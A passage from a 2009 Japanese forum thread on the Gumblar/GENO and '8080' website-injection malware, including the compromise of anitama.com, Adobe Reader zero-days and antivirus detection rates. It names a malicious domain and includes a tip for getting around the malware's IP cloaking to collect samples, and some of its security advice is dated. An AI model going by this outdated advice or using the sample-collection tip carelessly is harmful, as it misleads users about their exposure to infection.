404とかが返ってきたのならIP制限で拒否されたんじゃね
158:148
09/12/15 02:11:40
>>157
Virustotalのアップロード部分に、.phpのURLを入れてみた。
size0で、対応してくれなかったから、パソコン内のファイルじゃないとだめなのかと思って。
「攻撃スクリプトだけもらう」のがどういうことかわからないし、
今の自分には無理だということはわかった。
何度もありがとう。
名無しにもどります。
159:名無しさん@お腹いっぱい。
09/12/15 09:28:58
>>153
gumblarはphpでアクセス制御をしていて
同一ホストからの複数回のアクセスには404を返す。
aguseその他のゲートウェイ(つまりゲートウェイのIP)で
2回チェックするとそれ以降は無害判定になる。
(今は亡きソースチェッカーではproxyにチェック入れて引っかけていた)。
何度も何度も言ってるんだけど。
160:名無しさん@お腹いっぱい。
09/12/15 09:30:54
追記。1回踏んじゃった後であらためて検体を拾いたいのなら
モデムリセットしてIPを変えるかてきとーなproxyを刺すとかすればよろし。
161:名無しさん@お腹いっぱい。
09/12/15 19:43:23
声優個人の中村繪里子スレより。
ラジ関のアニラジサイトanitama.comがやられている模様
> 282 名無しさん@お腹いっぱい。 [sage] 2009/12/15(火) 17:48:43 ID:TnBI7JUt0 Be:
> ありがとう、その辺が妥当かな?
> ちと聞いてみる。
>
> とはいえ、xnxx-com.nu.nl.w3-org.goldgolfbag.ruなんてドメイン使うってことないよね?
> 283 名無しさん@お腹いっぱい。 [sage] 2009/12/15(火) 17:56:33 ID:7Tpx8wr40 Be:
> よくわからんけどキャッシュの方のソース見ると最後の一行が入ってないね
> 299 名無しさん@お腹いっぱい。 [sage] 2009/12/15(火) 18:50:45 ID:zA943d8b0 Be:
> anitama.comのページ全部やられているような気がする。
> 300 名無しさん@お腹いっぱい。 [sage] 2009/12/15(火) 18:52:16 ID:TnBI7JUt0 Be:
> >>297
> Adobe Readerを更新してなかったスタッフがいたんじゃないかなぁ。
> Javaと一緒にChangeLog.pdfってのも読み込ませようとしてたから、まず
> その辺かなという気がするよ。
スレリンク(voiceactor板)
162:名無しさん@お腹いっぱい。
09/12/15 19:45:47
先に書き込みありましね、勝手ながら注意喚起のため緊急浮上でage
163:名無しさん@お腹いっぱい。
09/12/15 20:33:54
中村繪里子スレの住人です。
インターネットラジオのページだけは大丈夫のようです。
各ページからは直接リンクではなく、javascriptで別ウィンドウを開く作りなのが功を奏したか。
もし番組を聞かれる方は直接飛んだ方がいいかと。URLリンク(anitama.com)
164:名無しさん@お腹いっぱい。
09/12/15 21:11:02
アニやまのHPにアクセスしたらおかしくなった…
アンチウイルスソフトいれてないんだけどヤバイですか?
165:名無しさん@お腹いっぱい。
09/12/15 21:38:08
Adobe Readerつかうより
Foxit Readerの方が安全と言えるだろうか
166:名無しさん@お腹いっぱい。
09/12/15 21:46:15
>164
>1の「更新」関係で抜けがあったらご愁傷さま
167:名無しさん@お腹いっぱい。
09/12/15 21:59:00
>>165
FoxitReaderにも似たような脆弱性なかったっけ
勘違いならスマソ
168:名無しさん@お腹いっぱい。
09/12/15 22:07:43
SecuniaがAdobe Reader危ないとうるさい
169:名無しさん@お腹いっぱい。
09/12/15 22:10:21
>>165
個人的には気休め程度には安全かと
Adobe Readerと同じ脆弱性が他のPDF Viewerにないとは言い切れないから
それより利便性は落ちるが、プラグインは切ってブラウザに連動させて見たりせずに
ダウンロードしてから見るようにしたほうが安全な気がする
あとゼロデイの脆弱性がAdobe Reader 9.2以下で発生している模様
詳細が不明なので対策しにくいが・・・
URLリンク(blogs.adobe.com)
170:名無しさん@お腹いっぱい。
09/12/15 22:42:53
このウイルスって、同一LAN上のPCは感染しますか?
アニ●マをネットブック(Puppy Linux4.3.1-jp SeaMonkey 1.1.18)で表示していて(ネトラジを聴いていて)、
他の作業を同一LAN上の他のPC(WinXP 一応>>1の対応は済)でやっていたのですが。
念のためネットブックは隔離、様子見中。
171:名無しさん@お腹いっぱい。
09/12/15 22:49:39
…めちゃくちゃおもたくなってきた。
まうすかーそるも長ゆっくりしか動かない
172:名無しさん@お腹いっぱい。
09/12/15 22:52:48
アニオタがダイ終結してるのか
とりあえず再インストールして
>1の更新関連をしておけ
173:名無しさん@お腹いっぱい。
09/12/15 22:57:58
>>170
Linuxでは感染しないので同一LAN上にWindowsがあっても大丈夫
またLAN上で動作するようなことは確認されていない
アップデートで対策をしているなら安心していい
174:170
09/12/15 23:03:14
>>173
レスとんくす。
安心しました。Linuxでは感染しないのですね。
ほっとしました。
ちなみに>>171は自分ではありません。
175:名無しさん@お腹いっぱい。
09/12/15 23:38:19
>>169
JavaScript切ればとりあえず回避できるとかあった
Adobe 0-day in the wild - again
URLリンク(isc.sans.org)
176:名無しさん@お腹いっぱい。
09/12/15 23:45:43
>>175
乙
このスレの住民ならAcrobat Javascriptは切ってるだろうから問題ないな
177:名無しさん@お腹いっぱい。
09/12/15 23:50:30
>>158
> Virustotalのアップロード部分に、.phpのURLを入れてみた。
これは無理
> パソコン内のファイルじゃないとだめなのかと思って。
そういうことです
アップロードしたファイルを確認できるのはそのファイルを持っている人だけ
VirusTotalからDLは不可能
DLできちゃったら危ないからね
178:名無しさん@お腹いっぱい。
09/12/16 00:59:43
ところでアニたまのウイルスは本当にGumblar系か?
似てはいるがスクリプトの挿入位置や内容が違うような
いままで <script>/*GNU GPL*/ こんなのなかったしカスペで反応しない・・・
あるいは新型のスクリプトなのか
結果: 0/41
URLリンク(www.virustotal.com)
179:名無しさん@お腹いっぱい。
09/12/16 01:04:21
糞ジャンクショップ GENO 閉店…店舗販売を終了しWeb販売のみに
スレリンク(news板)
やっぱ例の事件の影響があったのかな?
180:名無しさん@お腹いっぱい。
09/12/16 01:59:40
>>178
本体じゃないから反応しないだろ
ノートンで行くと反応した
181:名無しさん@お腹いっぱい。
09/12/16 02:32:41
>>180
なるほど本体バイナリは同じか
スクリプトが大きく変わったんだな
182:名無しさん@お腹いっぱい。
09/12/16 07:29:19
>>161-163
これはいわゆる8080系イジェクションで、gumblar(geno)じゃないよ。
使う脆弱性はおなじみFlashやAcrobatなので対策は同じ。
183:名無しさん@お腹いっぱい。
09/12/16 07:37:20
>>176
ついでに。
URLリンク(www.shadowserver.org)
Right now only 5 out of the 41 different Antivirus vendors used by Virustotal are detecting this threat.
Even then their detection appears to be generic and is not currently specifically detecting this exploit.
The 5 vendors to detect the threat are:
(McAfee-GW-Edition) *note this is not the same as McAfee Desktop or Mail Server Edition
(eSafe)
(NOD32)
(AntiVir)
(Kaspersky)
補足するとMcAfeeのGWは旧Webwasherで、McAfee+何かという構成で
VirusTotalのはMcAfee+AnviVir。実質4ベンダー。
eSafeがKasperskyオプション付きなら実質3ベンダー。
184:名無しさん@お腹いっぱい。
09/12/16 07:43:24
ほい、anitamaの初段スクリプト。
URLリンク(www.virustotal.com)
185:名無しさん@お腹いっぱい。
09/12/16 07:45:16
アニたまスレにもレスしたけど、こっちにも
いつもGumblar追っかけてくれてる人が検証してくれてた
「アニたまどっとコム」のサイトが改ざん被害。さまざまな脆弱性を突く処理が・・・
URLリンク(blogs.yahoo.co.jp)
上にもあるようにGumblarではないけど、Gumblarよりもタチ悪いかもな
ってことでこれ以上はここではスレチか
186:名無しさん@お腹いっぱい。
09/12/16 07:48:36
>>184
さっき誤ってアニたまに飛ぼうとしてカスペ先生が遮断してくれたとこだぜw
まあ砂箱内のブラウザで、js切った状態だったから飛んでも問題なかっただろうが
187:名無しさん@お腹いっぱい。
09/12/16 08:06:07
いちおanitamaのスクリプトは各社に提出済みです。
バスターはトレンドマイクソの鯖がおかしいんで送れてないけど。
188:名無しさん@お腹いっぱい。
09/12/16 09:49:45
>>185
スレチではあるが同じ脆弱性も突いているウイルスだから
ここでもアリのような気もする・・・ウイルス総合スレなんてないしな
189:名無しさん@お腹いっぱい。
09/12/16 11:46:30
アニヲタ撲滅運動か??
190:名無しさん@お腹いっぱい。
09/12/16 13:50:31
>184
今はカスペだけか、恐いな
191:名無しさん@お腹いっぱい。
09/12/16 13:56:07
検出の仕方にもよるからカスペだけとは限らない
現にノートンでも検出する
192:名無しさん@お腹いっぱい。
09/12/16 14:48:27
アンラボ?とかいうので駆除してみたんでもう大丈夫ですかね??
193:名無しさん@お腹いっぱい。
09/12/16 20:20:31
>>188
ページ改竄の総合情報スレ的なものってないのかな?
ちなみにアニたまは公式アナウンス来た
一応あのスクリプトは取り除いたみたいだが、まだ調査中の模様
完全に安全になりました、とは言えないな・・・
194:名無しさん@お腹いっぱい。
09/12/16 22:03:13
>>189
むしろ頑張れって感じだなw
195:名無しさん@お腹いっぱい。
09/12/16 22:44:44
>>193
アニたまに関しては、今のところスレチだ他でやれ的なレスも
ないようだからここでやってもよさそうだ
しかし、ページ改竄の被害が身近になってくると
総合情報スレ的なものが欲しくなるな
新しく立てても過疎りそうだから個人的には
次スレはこれを考慮に入れたスレにしたいものだが
196:名無しさん@お腹いっぱい。
09/12/16 22:49:57
スレチだ他でやれ
197:名無しさん@お腹いっぱい。
09/12/16 23:31:08
ああいうとやっぱりこういうレスがつくよなw
198:名無しさん@お腹いっぱい。
09/12/16 23:37:07
アニたまのは音楽ファイル自体は大丈夫なのかのう。
199:名無しさん@お腹いっぱい。
09/12/17 00:16:09
>195
アニたまはいい加減スレチとして、確かに>193の「インジェクション総合スレ」っぽいのは見たい
欲張って「マルウェア・ウイルス総合スレ」にしちゃうと、分量・速度的にキリが無さそうだしな
200:名無しさん@お腹いっぱい。
09/12/17 00:23:39
ブラウジングウイルス対策総合スレ
201:名無しさん@お腹いっぱい。
09/12/17 00:28:39
>>199
たしかに欲張ると質問が押し寄せて収拾つかなくなりそうだ
ただ、範囲を絞りすぎると過疎が怖いしな・・・
検索で見つけやすいスレタイやテンプレの問題もあるが
202:名無しさん@お腹いっぱい。
09/12/17 00:47:06
【Gumblar】Webウイルス対策総合スレ【8080】
203:名無しさん@お腹いっぱい。
09/12/17 01:03:34
【Gumblar/GENO】Web改竄ウイルス総合スレ【8080】
ではどう? GENOと改竄を入れた方が分かり易いと思う。
204:名無しさん@お腹いっぱい。
09/12/17 01:11:09
なんか建てるならブラウザ戦争おこさないようにテンプラ気をつけろ
205:名無しさん@お腹いっぱい。
09/12/17 02:06:07
ここ来る連中にちょろいやつはいないだろうからもうここイラネ
206:名無しさん@お腹いっぱい。
09/12/17 02:35:09
【Gumblar/GENO】Web改竄ウイルス情報総合スレ【8080】
ちょっと長いけどこれでどうだ?
情報って言葉を入れることであくまでも第一報やそれに準じる大まかな情報のみ扱う
で、被害が大きかったり細かい対策で情報量が増えていくようだったら
そのウイルスごとに別スレを立てて誘導していくって感じ
次ページ最新レス表示スレッドの検索類似スレ一覧話題のニュースおまかせリスト▼オプションを表示暇つぶし2ch
5390日前に更新/177 KB
担当:undef